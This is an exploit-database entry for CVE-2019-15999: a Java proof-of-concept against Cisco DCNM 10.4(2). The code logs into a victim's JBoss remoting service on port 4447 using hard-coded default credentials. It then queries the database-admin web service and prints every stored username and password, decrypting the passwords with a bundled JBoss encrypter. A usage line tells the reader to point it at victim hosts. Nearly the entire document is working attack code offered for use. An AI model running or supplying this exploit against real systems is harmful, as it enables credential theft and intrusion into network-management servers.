Share
# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage  
# Date: 2020-01-06  
# Exploit Author: Harrison Neal  
# Vendor Homepage: https://www.cisco.com/  
# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)  
# Version: 10.4(2)  
# CVE: CVE-2019-15999  
  
# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code  
# To compile, file path should match ${package}/${class}.java, e.g.,  
# com/whatdidibreak/dcnm_expl/Main.java  
  
# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]  
  
package com.whatdidibreak.dcnm_expl;  
  
import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;  
import com.cisco.dcbu.jaxws.wo.DBRowDO;  
import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;  
  
import java.util.Properties;  
  
import javax.naming.Context;  
import javax.naming.InitialContext;  
  
public class Main {  
  
public static void main(String[] args) throws Throwable {  
for (String target : args) {  
System.out.println("Target: " + target);  
  
Properties jndiProps = new Properties();  
jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");  
jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");  
jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");  
jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");  
jndiProps.put("jboss.naming.client.ejb.context", true);  
  
Context ctx = new InitialContext(jndiProps);  
  
DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");  
  
for (DBRowDO row : i.getServerProperties(null).getRows()) {  
String propName = row.getEntry()[0];  
String propValue = row.getEntry()[1];  
  
if (propValue.isEmpty()) {  
continue;  
}  
  
if (propName.contains("user")) {  
System.out.println(propName + " = " + propValue);  
} else if (propName.contains("pass")) {  
System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");  
}  
}  
  
System.out.println();  
}  
}  
}